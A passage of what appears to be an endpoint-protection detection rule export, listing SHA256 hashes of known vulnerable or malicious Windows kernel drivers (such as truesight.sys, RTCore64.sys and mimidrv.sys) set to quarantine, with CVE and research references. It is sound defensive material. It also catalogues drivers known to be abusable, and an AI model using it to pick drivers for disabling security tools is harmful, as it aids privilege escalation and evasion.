+ "creation_date": "2026-03-23T11:45:30.460325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bac1cd96ba242cdf29f8feac501110739f1524f0db1c8fcad59409e77b8928ba",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5a07acb-241c-57f5-a7ab-33ba4114581c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146655Z",
+ "creation_date": "2026-03-23T11:45:31.146657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ec76a3ae9ae2579d0aa7e44c6338a1436fbc28bbbeb2f586f3ccea31f7a6ec1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5a48ccf-bc66-5b65-a4f3-16546467a565",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808686Z",
+ "creation_date": "2026-03-23T11:45:31.808688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37299f468d95e1ad7b169792f34050353f95d6e57cd0a1e0d6b1c20f3481ee09",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5a978f5-9c98-5931-bb3c-b3c7ccd52133",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817696Z",
+ "creation_date": "2026-03-23T11:45:30.817698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9db97bd12d2d734ccd86045bae1fd5fbeed106ba5cfa519e6fcd9093c1c04a6",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5abb75d-c640-518e-8919-d129d537df61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818495Z",
+ "creation_date": "2026-03-23T11:45:31.818499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "220b989ee7056dde3c5e1fbcc26b66ba23b14f3a2b1ea8ea943c7f58aa4b5a44",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5af8ee1-e553-5193-b423-131a20178fcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620107Z",
+ "creation_date": "2026-03-23T11:45:29.620110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb71a8ecef692e74ae356e8cb734029b233185ee5c2ccb6cc87cc6b36bea65cf",
+ "comment": "Vulnerable Kernel Driver (aka semav6msr.sys) [https://www.loldrivers.io/drivers/142453a2-a24d-4b35-8922-6d5939f1c0fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5bd0af1-0dc9-509c-b2b9-053a2bdb4866",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617501Z",
+ "creation_date": "2026-03-23T11:45:29.617503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38bb9751a3a1f072d518afe6921a66ee6d5cf6d25bc50af49e1925f20d75d4d7",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5bf72f2-173f-5150-99bf-0fab059c4e03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475730Z",
+ "creation_date": "2026-03-23T11:45:31.475735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be9a3cad35f1cc574c4ad806004a53d0d2b82e70f00677f15c2563fd93f911dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5ccf01e-21f8-5477-b664-3faa190f953f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492179Z",
+ "creation_date": "2026-03-23T11:45:31.492181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70741d40dc7f0f7522b177846cdd4440c191f137642fa22c0eb86861dca5a6f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5dfcda8-175d-5a20-bb22-5334588b69f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976552Z",
+ "creation_date": "2026-03-23T11:45:29.976554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45b9eee68266d1128bc252087f4a8ae18dbb0e0b6317e28bc248b25ca2431a56",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5e00e10-753d-565c-ad36-70b92a09e07c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145470Z",
+ "creation_date": "2026-03-23T11:45:32.145472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4fc254af8ebfa6fc1050f65c17015b39b36693b58f029c2fa1873976cbca52df",
+ "comment": "Malicious Kernel Driver (aka driver_4fc254af.sys) [https://www.loldrivers.io/drivers/85335187-dae0-4f06-acea-209efaf74973/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e5e549b9-d4de-5054-a238-0f6274817a01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984750Z",
+ "creation_date": "2026-03-23T11:45:29.984753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrIbDrv.Sys) [https://www.loldrivers.io/drivers/31797996-6973-402d-a4a0-d01ce51e02c0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e603aef4-f3e1-532d-9aed-c91db07c7e56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618407Z",
+ "creation_date": "2026-03-23T11:45:29.618409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f583cfb8aab7d084dc052dbd0b9d56693308cbb26bd1b607c2aedf8ee2b25e44",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e63e5019-50e8-5685-b3c4-506e0ddea68a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827330Z",
+ "creation_date": "2026-03-23T11:45:31.827332Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827338Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fbe174f035e18fdd51af52d73eee45479728e84c1e9bb38c2e70ebf77301291",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e63fbe78-6f81-5590-9e60-4927ced8ff0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979777Z",
+ "creation_date": "2026-03-23T11:45:29.979779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9be868eb7e177ee6d762f2a022acf18b6b190fecbe445b3c09fc0494e8244ee8",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e645793a-04ae-59fe-aed6-07603eb92b47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495023Z",
+ "creation_date": "2026-03-23T11:45:31.495025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7788872dc0b5c9b870e18c1be9bfd50e42b3149aff2b6322f3c23f6a4a342342",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e650a3a2-df01-5f66-b36d-9868fd9b4f39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968668Z",
+ "creation_date": "2026-03-23T11:45:29.968670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66a43661e2bd1e3c1d8f5c3eabd7a7861c5edad3d0fe54d52b26a5ce04f2d874",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e653e82d-b981-588d-baba-e5a8c5c93292",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159498Z",
+ "creation_date": "2026-03-23T11:45:31.159501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91a13c74aaf017149e1ab5295b93fe98adaec813e6b33c36d7b3ca813e706961",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6562402-d386-5cb9-98a3-aa45e0672d4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470553Z",
+ "creation_date": "2026-03-23T11:45:30.470556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fe7b0aaeb4b93840492f7d299a5ac481feb74296afcda1da4214db40856f003",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6654aca-70eb-5793-90c5-4b61d2300745",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500121Z",
+ "creation_date": "2026-03-23T11:45:31.500124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab650310346e12c495d166265324002af2fe2d71a8cba692a58790ec1a834d4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6671165-9be8-5756-a65f-91c681131817",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972577Z",
+ "creation_date": "2026-03-23T11:45:29.972580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b2f051ac901ab47d0012a1002cb8b2db28c14e9480c0dd55e1ac11c81ba9285",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e67dafc2-e245-5d0b-b63d-6fe9b653f5c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982121Z",
+ "creation_date": "2026-03-23T11:45:29.982123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45ba688a4bded8a7e78a4f5b0dc21004e951ddceb014bb92f51a3301d2fbc56a",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e68be877-9184-5e8f-ae55-168f84e6a19f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160927Z",
+ "creation_date": "2026-03-23T11:45:31.160929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
